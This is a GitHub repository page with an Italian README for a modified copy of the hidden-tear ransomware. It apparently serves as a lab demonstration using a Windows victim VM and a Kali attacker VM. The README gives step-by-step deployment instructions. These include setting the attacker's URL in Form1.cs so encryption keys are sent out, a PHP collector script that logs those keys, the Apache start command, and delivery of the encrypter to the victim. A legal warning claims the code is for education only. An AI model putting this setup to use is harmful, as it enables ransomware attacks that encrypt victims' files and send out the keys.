Skip to content

Repa235/hidden-tear-Voy-Michanji

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

18 Commits
 
 
 
 
 
 
 
 

Repository files navigation

Copia dello storico ransomware open source:

     _     _     _     _              _                  
    | |   (_)   | |   | |            | |                 
    | |__  _  __| | __| | ___ _ __   | |_ ___  __ _ _ __ 
    | '_ \| |/ _` |/ _` |/ _ \ '_ \  | __/ _ \/ _` | '__|
    | | | | | (_| | (_| |  __/ | | | | ||  __/ (_| | |   
    |_| |_|_|\__,_|\__,_|\___|_| |_|  \__\___|\__,_|_|   

Per utilizzarlo mi sono servito di

  • due macchine virtuali:
    • una con windows 10 che fungeva da vittima.
    • una con kali linux che faceva da attaccante.
  • Il mio pc con visual studio installato.

Nel mio pc, con visual studio

  • A riga 40 del file Form1.cs aggiungere l'indirizzo IP della macchina con kali linux e l'indirizzamento al file keys.php (file che verrà spiegato nello successivamente nella guida):
  string targetURL = "http://192.168.17.128/keys.php?info=";                                                                     
  • Nei file di encription e decription è stato corretto il problema del padding
  • (opzionale) è possibile cambiare l'estensione dei file dopo la crittografia, nel mio caso sono settati a .bloccato, per farlo bisogna cambiare l'estensione sia nell'encrypter che nel decrypter.

Nella macchina con kali linux

  • Nella cartella var/www/html creare un file data.txt e un file keys.php. Per farlo bisogna aprire un terminale nella cartella e lanciare:
sudo gedit data.txt
sudo gedit keys.php
         
  • Con i permessi di amministratore settare l'accesso read and write al file data.txt da parte di www-data nella sezione group. Bisogna entrare nel file manager in modalità sudo, per entrarci ho eseguito:
sudo xdg-open .
  • In keys.php ho inserito questo codice:
 <?php
	$info = $_GET['info'];
	$file = fopen("data.txt", "a");
	fwrite($file, $info."". PHP_EOL);
	fclose($file);
?>
         
  • Infine aprire un terminale nella stessa cartella e lanciare:
service apache2 start                                                                           

Alla macchina 'vittima'

  • Inviare i file
    • hidden-tear.exe che si trova in [\hidden-tear\hidden-tear\bin\Debug]
    • e hidden-tear-decripter.exe che si trova in [\hidden-tear-decrypter\hidden-tear-decrypter\bin\Debug]

Riferimento

Riferimento video

Legal Warning

While this may be helpful for some, there are significant risks. hidden tear may be used only for Educational Purposes. Do not use it as a ransomware! You could go to jail on obstruction of justice charges just for running hidden tear, even though you are innocent.

Anche se questo può essere utile per alcuni, ci sono rischi significativi. Può essere utilizzato solo per scopi educativi. Non usarlo come ransomware! Potresti finire in prigione con l'accusa di ostruzione alla giustizia, anche se sei innocente.

Non mi assumo alcuna responsabilità per eventuali danni a persone, hardware o software, diretti o indiretti, che dovessero verificarsi come conseguenza dell’utilizzo dei miei progetti (inclusi, senza limitazioni, i danni all’integrità fisica e i danni per perdita o mancato guadagno, interruzione dell’attività, perdita di informazioni o altre perdite economiche).

About

Rransomware basato su hidden-tear

Topics

Resources

Stars

Watchers

Forks

Languages

  • C# 100.0%